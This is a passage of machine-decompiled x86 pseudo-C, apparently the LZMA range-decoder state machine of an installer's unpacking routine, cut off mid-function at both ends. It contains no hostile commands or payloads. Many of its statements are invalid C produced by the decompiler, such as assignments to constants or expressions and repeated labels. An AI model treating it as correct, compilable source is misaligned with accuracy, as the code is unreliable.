                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                  												goto L132;
                                  											case 3:
                                  												L21:
                                  												__eflags =  *(_t621 - 0x6c);
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													 *(_t621 - 0x88) = 3;
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												_t67 = _t621 - 0x70;
                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                  												__eflags =  *_t67;
                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                  												L23:
                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                  												if( *(_t621 - 0x48) != 0) {
                                  													goto L21;
                                  												}
                                  												goto L24;
                                  											case 4:
                                  												L133:
                                  												_t540 =  *_t614;
                                  												_t597 = _t540 & 0x0000ffff;
                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                  												if( *(_t621 - 0xc) >= _t573) {
                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                  													 *(_t621 - 0x40) = 1;
                                  													_t541 = _t540 - (_t540 >> 5);
                                  													 *_t614 = _t541;
                                  												} else {
                                  													 *(_t621 - 0x10) = _t573;
                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                  												}
                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                  													goto L139;
                                  												}
                                  											case 5:
                                  												goto L137;
                                  											case 6:
                                  												__edx = 0;
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) = 1;
                                  													 *(__ebp - 0x84) = 7;
                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  												__esi =  *(__ebp - 0x60);
                                  												__cl = 8;
                                  												__cl = 8 -  *(__ebp - 0x3c);
                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  												__ecx =  *(__ebp - 0x3c);
                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  												__ecx =  *(__ebp - 4);
                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  												__eflags =  *(__ebp - 0x38) - 4;
                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												if( *(__ebp - 0x38) >= 4) {
                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                  													if( *(__ebp - 0x38) >= 0xa) {
                                  														_t98 = __ebp - 0x38;
                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                  														__eflags =  *_t98;
                                  													} else {
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  													}
                                  												} else {
                                  													 *(__ebp - 0x38) = 0;
                                  												}
                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                  												if( *(__ebp - 0x34) == __edx) {
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													goto L61;
                                  												} else {
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__ecx =  *(__ebp - 8);
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  													goto L41;
                                  												}
                                  											case 7:
                                  												goto L0;
                                  											case 8:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xa;
                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  												} else {
                                  													__eax =  *(__ebp - 0x38);
                                  													__ecx =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                  													 *(__ebp - 0x84) = 9;
                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  												}
                                  												while(1) {
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  											case 9:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													goto L89;
                                  												}
                                  												__eflags =  *(__ebp - 0x60);
                                  												if( *(__ebp - 0x60) == 0) {
                                  													goto L171;
                                  												}
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  												__eflags = _t258;
                                  												0 | _t258 = _t258 + _t258 + 9;
                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  												goto L75;
                                  											case 0xa:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xb;
                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t621 - 0x54) = _t614;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x28);
                                  												goto L88;
                                  											case 0xb:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__ecx =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x20);
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												} else {
                                  													__eax =  *(__ebp - 0x24);
                                  												}
                                  												__ecx =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												L88:
                                  												__ecx =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x2c) = __eax;
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												L89:
                                  												__eax =  *(__ebp - 4);
                                  												 *(__ebp - 0x80) = 0x15;
                                  												__eax =  *(__ebp - 4) + 0xa68;
                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  												goto L68;
                                  											case 0xc:
                                  												L99:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xc;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t334 = __ebp - 0x70;
                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t334;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												__eax =  *(__ebp - 0x2c);
                                  												goto L101;
                                  											case 0xd:
                                  												L37:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xd;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t122 = __ebp - 0x70;
                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t122;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L39:
                                  												__eax =  *(__ebp - 0x40);
                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  													goto L48;
                                  												}
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													goto L54;
                                  												}
                                  												L41:
                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  												 *(__ebp - 0x48) = __eax;
                                  												__eax = __eax + 1;
                                  												__eax = __eax << 8;
                                  												__eax = __eax + __ebx;
                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edx = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													 *(__ebp - 0x40) = 1;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													__ebx = __ebx + __ebx + 1;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edx;
                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L39;
                                  												} else {
                                  													goto L37;
                                  												}
                                  											case 0xe:
                                  												L46:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xe;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t156 = __ebp - 0x70;
                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t156;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												while(1) {
                                  													L48:
                                  													__eflags = __ebx - 0x100;
                                  													if(__ebx >= 0x100) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x58);
                                  													__edx = __ebx + __ebx;
                                  													__ecx =  *(__ebp - 0x10);
                                  													__esi = __edx + __eax;
                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                  													__ax =  *__esi;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__edi = __ax & 0x0000ffff;
                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                  													if( *(__ebp - 0xc) >= __ecx) {
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  														__cx = __ax;
                                  														_t170 = __edx + 1; // 0x1
                                  														__ebx = _t170;
                                  														__cx = __ax >> 5;
                                  														__eflags = __eax;
                                  														 *__esi = __ax;
                                  													} else {
                                  														 *(__ebp - 0x10) = __ecx;
                                  														0x800 = 0x800 - __edi;
                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  														__ebx = __ebx + __ebx;
                                  														 *__esi = __cx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														continue;
                                  													} else {
                                  														goto L46;
                                  													}
                                  												}
                                  												L54:
                                  												_t173 = __ebp - 0x34;
                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  												__eflags =  *_t173;
                                  												goto L55;
                                  											case 0xf:
                                  												L58:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xf;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t203 = __ebp - 0x70;
                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t203;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L60:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													L55:
                                  													__al =  *(__ebp - 0x44);
                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  													goto L56;
                                  												}
                                  												L61:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t217 = __edx + 1; // 0x1
                                  													__ebx = _t217;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L60;
                                  												} else {
                                  													goto L58;
                                  												}
                                  											case 0x10:
                                  												L109:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x10;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t365 = __ebp - 0x70;
                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t365;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												goto L111;
                                  											case 0x11:
                                  												L68:
                                  												_t614 =  *(_t621 - 0x58);
                                  												 *(_t621 - 0x84) = 0x12;
                                  												while(1) {
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  											case 0x12:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 0x58);
                                  													 *(__ebp - 0x84) = 0x13;
                                  													__esi =  *(__ebp - 0x58) + 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t621 - 0x54) = _t614;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												__eflags = __eax;
                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                  												goto L130;
                                  											case 0x13:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													_t469 = __ebp - 0x58;
                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  													__eflags =  *_t469;
                                  													 *(__ebp - 0x30) = 0x10;
                                  													 *(__ebp - 0x40) = 8;
                                  													L144:
                                  													 *(__ebp - 0x7c) = 0x14;
                                  													goto L145;
                                  												}
                                  												__eax =  *(__ebp - 0x4c);
                                  												__ecx =  *(__ebp - 0x58);
                                  												__eax =  *(__ebp - 0x4c) << 4;
                                  												 *(__ebp - 0x30) = 8;
                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  												L130:
                                  												 *(__ebp - 0x58) = __eax;
                                  												 *(__ebp - 0x40) = 3;
                                  												goto L144;
                                  											case 0x14:
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  												__eax =  *(__ebp - 0x80);
                                  												 *(_t621 - 0x88) = _t542;
                                  												goto L1;
                                  											case 0x15:
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  												goto L120;
                                  											case 0x16:
                                  												__eax =  *(__ebp - 0x30);
                                  												__eflags = __eax - 4;
                                  												if(__eax >= 4) {
                                  													_push(3);
                                  													_pop(__eax);
                                  												}
                                  												__ecx =  *(__ebp - 4);
                                  												 *(__ebp - 0x40) = 6;
                                  												__eax = __eax << 7;
                                  												 *(__ebp - 0x7c) = 0x19;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L145;
                                  											case 0x17:
                                  												L145:
                                  												__eax =  *(__ebp - 0x40);
                                  												 *(__ebp - 0x50) = 1;
                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  												goto L149;
                                  											case 0x18:
                                  												L146:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0x18;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t484 = __ebp - 0x70;
                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t484;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												L148:
                                  												_t487 = __ebp - 0x48;
                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                  												__eflags =  *_t487;
                                  												L149:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__ecx =  *(__ebp - 0x40);
                                  													__ebx =  *(__ebp - 0x50);
                                  													0 = 1;
                                  													__eax = 1 << __cl;
                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  													__eax =  *(__ebp - 0x7c);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													while(1) {
                                  														 *(_t621 - 0x88) = _t542;
                                  														goto L1;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x50);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  												__eax =  *(__ebp - 0x58);
                                  												__esi = __edx + __eax;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__ax =  *__esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													__cx = __ax >> 5;
                                  													__eax = __eax - __ecx;
                                  													__edx = __edx + 1;
                                  													__eflags = __edx;
                                  													 *__esi = __ax;
                                  													 *(__ebp - 0x50) = __edx;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													goto L148;
                                  												} else {
                                  													goto L146;
                                  												}
                                  											case 0x19:
                                  												__eflags = __ebx - 4;
                                  												if(__ebx < 4) {
                                  													 *(__ebp - 0x2c) = __ebx;
                                  													L119:
                                  													_t393 = __ebp - 0x2c;
                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                  													__eflags =  *_t393;
                                  													L120:
                                  													__eax =  *(__ebp - 0x2c);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  														goto L170;
                                  													}
                                  													__eflags = __eax -  *(__ebp - 0x60);
                                  													if(__eax >  *(__ebp - 0x60)) {
                                  														goto L171;
                                  													}
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  													__eax =  *(__ebp - 0x30);
                                  													_t400 = __ebp - 0x60;
                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  													__eflags =  *_t400;
                                  													goto L123;
                                  												}
                                  												__ecx = __ebx;
                                  												__eax = __ebx;
                                  												__ecx = __ebx >> 1;
                                  												__eax = __ebx & 0x00000001;
                                  												__ecx = (__ebx >> 1) - 1;
                                  												__al = __al | 0x00000002;
                                  												__eax = (__ebx & 0x00000001) << __cl;
                                  												__eflags = __ebx - 0xe;
                                  												 *(__ebp - 0x2c) = __eax;
                                  												if(__ebx >= 0xe) {
                                  													__ebx = 0;
                                  													 *(__ebp - 0x48) = __ecx;
                                  													L102:
                                  													__eflags =  *(__ebp - 0x48);
                                  													if( *(__ebp - 0x48) <= 0) {
                                  														__eax = __eax + __ebx;
                                  														 *(__ebp - 0x40) = 4;
                                  														 *(__ebp - 0x2c) = __eax;
                                  														__eax =  *(__ebp - 4);
                                  														__eax =  *(__ebp - 4) + 0x644;
                                  														__eflags = __eax;
                                  														L108:
                                  														__ebx = 0;
                                  														 *(__ebp - 0x58) = __eax;
                                  														 *(__ebp - 0x50) = 1;
                                  														 *(__ebp - 0x44) = 0;
                                  														 *(__ebp - 0x48) = 0;
                                  														L112:
                                  														__eax =  *(__ebp - 0x40);
                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  															_t391 = __ebp - 0x2c;
                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  															__eflags =  *_t391;
                                  															goto L119;
                                  														}
                                  														__eax =  *(__ebp - 0x50);
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  														__eax =  *(__ebp - 0x58);
                                  														__esi = __edi + __eax;
                                  														 *(__ebp - 0x54) = __esi;
                                  														__ax =  *__esi;
                                  														__ecx = __ax & 0x0000ffff;
                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                  														if( *(__ebp - 0xc) >= __edx) {
                                  															__ecx = 0;
                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  															__ecx = 1;
                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  															__ebx = 1;
                                  															__ecx =  *(__ebp - 0x48);
                                  															__ebx = 1 << __cl;
                                  															__ecx = 1 << __cl;
                                  															__ebx =  *(__ebp - 0x44);
                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                  															__cx = __ax;
                                  															__cx = __ax >> 5;
                                  															__eax = __eax - __ecx;
                                  															__edi = __edi + 1;
                                  															__eflags = __edi;
                                  															 *(__ebp - 0x44) = __ebx;
                                  															 *__esi = __ax;
                                  															 *(__ebp - 0x50) = __edi;
                                  														} else {
                                  															 *(__ebp - 0x10) = __edx;
                                  															0x800 = 0x800 - __ecx;
                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  															 *__esi = __dx;
                                  														}
                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                  															L111:
                                  															_t368 = __ebp - 0x48;
                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                  															__eflags =  *_t368;
                                  															goto L112;
                                  														} else {
                                  															goto L109;
                                  														}
                                  													}
                                  													__ecx =  *(__ebp - 0xc);
                                  													__ebx = __ebx + __ebx;
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													 *(__ebp - 0x44) = __ebx;
                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  														__ecx =  *(__ebp - 0x10);
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  														__ebx = __ebx | 0x00000001;
                                  														__eflags = __ebx;
                                  														 *(__ebp - 0x44) = __ebx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L101:
                                  														_t338 = __ebp - 0x48;
                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                  														__eflags =  *_t338;
                                  														goto L102;
                                  													} else {
                                  														goto L99;
                                  													}
                                  												}
                                  												__edx =  *(__ebp - 4);
                                  												__eax = __eax - __ebx;
